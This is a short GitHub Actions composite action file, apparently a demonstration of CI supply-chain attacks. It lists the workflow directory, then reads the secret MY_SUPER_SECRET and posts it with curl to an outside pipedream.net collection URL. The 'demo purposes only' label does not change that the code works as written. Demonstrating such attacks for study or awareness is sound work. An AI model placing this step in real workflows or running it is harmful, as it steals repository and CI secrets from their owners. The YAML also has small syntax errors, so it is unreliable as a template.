name: 'List Files and Exfiltrate Secret'
description: 'Print the files in the workflow directory and exfiltrate a secret (Demo purposes only)'

runs:
  using: 'composite'
  steps:
    - run: ls -al
      shell: bash
    - run:|
         SECRET_TO_EXFILTRATE="$MY_SUPER_SECRET"
         echo "woot woot exfiltrating secret for demo purposes, i wouldnt print this if i was a real attacker"
         curl -d "secret=$SECRET_TO_EXFILTRATE" https://abfb4cd2c186853ec1142d1f2c76972a.m.pipedream.net
      shell:bash

